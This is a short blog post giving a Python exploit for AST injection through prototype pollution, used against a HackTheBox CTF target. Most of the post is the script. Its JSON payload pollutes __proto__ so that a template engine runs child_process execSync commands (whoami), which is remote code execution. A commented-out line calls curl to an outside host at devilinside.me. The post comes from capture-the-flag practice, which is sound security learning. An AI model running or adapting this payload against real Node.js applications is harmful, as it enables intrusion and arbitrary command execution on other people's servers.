cool head picture

UNLE⛧SH THE BEAST ト何ゼ

AST Injection Example

Nov. 29, 2020 // echel0n

Here is an AST Injection example. Exploit was relying on the error output.
It was used on HackTheBox CTF.
For further information, please consider reading this article.
https://blog.p6.is/AST-Injection/
Have a nice day! 

  1. #!/usr/bin/env python

  2. 

  3. import requests

  4. 

  5. TARGET_URL = 'http://docker.hackthebox.eu:32561'

  6. 

  7. # make pollution

  8. r = requests.post(TARGET_URL + '/api/submit', json = {

  9.     "artist.__proto__.prototype.type": "Program",

  10.     "artist.__proto__.name" : "Haigh",

  11.     # "__proto__.name": "process.mainModule.require('child_process').execSync(`curl 'http://devilinside.me:8080/'`)",

  12.     "artist.__proto__.body": [{

  13.         "type": "MustacheStatement",

  14.         "path": 0,

  15.         "params": [{

  16.             "type": "NumberLiteral",

  17.             "value": "process.mainModule.require('child_process').execSync(`sh -c 'whoami'`)"

  18.         }],

  19.         "loc": {

  20.             "start": 0,

  21.             "end": 0

  22.         }

  23.     }]

  24. })

  25. # execute

  26. print(r.text)

  27. r = requests.get(TARGET_URL)

  28. # print(r.text)

  29. print("done")